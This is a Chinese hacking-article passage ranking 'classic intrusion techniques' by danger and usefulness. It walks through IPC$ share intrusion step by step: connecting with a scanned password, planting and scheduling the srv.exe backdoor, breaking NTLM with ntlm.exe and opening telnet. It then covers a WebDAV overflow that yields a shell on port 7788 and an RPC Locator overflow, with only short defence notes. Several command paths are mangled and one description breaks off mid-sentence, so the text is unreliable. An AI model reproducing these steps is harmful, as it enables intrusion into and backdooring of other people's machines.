经典入侵技术

　　入侵难度：★★★（中等）

　　存在范围：★★★（中等）

　　危险指数：★★★★★（很高）

　　使用几率：★★★★★（很高）

　　好用指数：75%

　　编辑部评审意见：

　　众所周知，安全问题是一个极具时效的问题，就拿两年前百试不爽的.printer溢出和unicode来说吧，在本年度基本上就没怎么再见有还用！

　　然而似乎也有例外，针对IPC$问题的攻击就常用常新。

　　什么是IPC$漏洞：

　　IPC$是共享“命名管道”的资源，主要用于程序间的通讯。在远程管理计算机和查看计算机的共享资源时使用。利用默认的IPC$我们可以与目标主机建立一个空的连接（无需用户名与密码），而利用这个空的连接，我们就可以得目标主机上的用户列表。

　　我们总在说ipc$漏洞ipc$漏洞，其实，ipc$并不是真正意义上的漏洞，它是为了方便管理员的远程管理而开放的远程网络登陆功能，而且还打开了默认共享，即所有的逻辑盘(c$，d$，e$……)和系统目录winnt或windows(admin$)。

　　所有的这些，初衷都是为了方便管理员的管理，但好的初衷并不一定有好的收效，一些别有用心者(到底是什么用心?我也不知道，代词一个)会利用IPC$，访问共享资源，导出用户列表，并使用一些字典工具，进行密码探测，寄希望于获得更高的权限，从而达到不可告人的目的。

　　攻击工具：

　　扫描软件：流光4.71

　　木马软件：srv.exe

　　简单攻击：

　　1. 打开流光4.71

　　2. 进行扫描前的设置

　　3. 假设扫出127.0.0.1存在ipc$漏洞，我们进行如下操作

　　C:>net use \127.0.0.1$ "" /user:"admintitrators" //这是用流光扫到的密码

　　C:>copy srv.exe \127.0.0.1$ //先复制srv.exe上去，在流光的Tools目录就有

　　出现如下提示：

　　c:

　　已复制 1 个文件

　　C:>net time \127.0.0.1 //查时间，这里的时间是指对方计算机的，也就是我们要入侵的127.0.0.1的时间，还有要提醒大家要注意的一点是，请把时间转换为24小时制

　　C:>at \127.0.0.1 11:05 srv.exe //用at命令启动srv.exe

　　C:>net time \127.0.0.1 //再查查够时间没有

　　C:>telnet 127.0.0.1 99 //我们telnet吧，注意端口是99，因为这里我们用的是srv.exe。

　　C:>copy ntlm.exe \127.0.0.1$ //我们再开一个DOS窗口，把ntlm.exe上传到主机上，在流光的tools目录有

　　C:>ntlm //运行，破坏对方机器的ntlm验证模式，使我们能通过直接连接对方的telnet模式。

　　C:>

　　C:>net start telnet //然后直接用net start telnet启动telnet

　　Telnet 服务器正在启动.

　　Telnet 服务器已经启动成功。 C //成功

　　这时我们就可以直接使用TELNET 127.0.0.1连接对方了。

　　至此入侵结束。

　　如何防御：

　　1. 禁止建立空连接

　　[HKEY_LOCAL_MACHINE]

　　RestrictAnonymous = DWORD:00000001

　　2. 禁止管理共享

　　[HKEY_LOCAL_MACHINE]

　　AutoShareServer = DWORD:00000000

二、 神话Webdav

　　入侵难度：★★★（中等）

　　存在范围：★★★★（高）

　　危险指数：★★★★★（很高）

　　使用几率：★★★★（高）

　　好用指数：65%

　　编辑部评审意见：

　　由于篇幅的限制本文在组稿过程中，我们就突出一个简单而实用的方针，那么在今年3-5月左右开始的Webdav攻击热中使用的webdav攻击方法无疑应该在我们的榜单中！

　　Webdav漏洞说明：

　　Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebDAV)”协议。RFC 2518 中定义的 WebDAV 是超文本传输协议 (HTTP) 的一组扩展，为 Internet 上计算aIIS 服务（默认情况下在 LocalSystem 上下文中运行）的安全上下文中运行。 尽管 Microsoft 已为此弱点提供了修补程序并建议客户立即安装该修补程序，但还是提供了其他的工具和预防措施，客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利用。

　　攻击工具：

　　扫描器：Webdavscan（是一个专门用于检测IIS 5.0 服务器是否提供了对WebDAV的支持的扫描器）

　　溢出程序：wdx.exe

　　简单攻击：

　　1. 使用Webdavscan对目标进行扫描、检测！

　　2. 使用wdx.exe进行测试，这里需要注意有耐心，可以对溢出偏移量多测试几个值。

　　3. 溢出成功后，使用telnet或者是nc等连接到目标主机的7788端口。

　　如：telnet 127.0.0.1 7788

　　将出现以下提示：

　　Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:>

　　至此入侵结束！

　　如何防御：

　　1. 搜索注册表中的如下键：

　　HKEY_LOCAL_MACHINESVC

　　增加如下注册表键值：

　　Value name: DisableWebDAV

　　Data type: DWORD

　　Value data: 1

　　2. 使用MS提供的专用补丁！

三、毁灭者RPC

　　入侵难度：★★（低）

　　存在范围：★★★★★（很高）

　　危险指数：★★★★★（很高）

　　使用几率：★★★★（高）

　　好用指数：80%

　　编辑部评审意见：

　　小编我最爱看武侠小说了，常常看到作者这么形容一个有才华的大将：一将功成万古枯！看看案头这关于RPC蠕虫对全球经济的影响和该漏洞在漏洞领域的地位后，不由的就联系到一起了。

　　RPC漏洞简介：

　　Windows PRC Locator服务是一款映射逻辑名称到网络特定名称的名字服务。客户端使用RPC（remote procedure call）远程过程调用Locator服务，Locator服务负责把客户提交的网络名解析转换为硬盘，打印机等计算机系统上实际资源的地址。如果某一个打印机服务器逻辑名为"laserprinter"，RPC客户端调用Locator服务来找出网络名所映射的"laserprinter"，RPC客户端在调用RPC服务的时候使用网络名来提交请求。

　　不过Locator服务在接收注册信息的时候没有对Locator服务的参数进行详细检查，超长超大的参数可以导致服务程序触发缓冲区溢出，使Locator服务崩溃，精心构建提交数据可能以Locator服务进程的权限在系统上执行任意指令，而且攻击者获取的是system权限。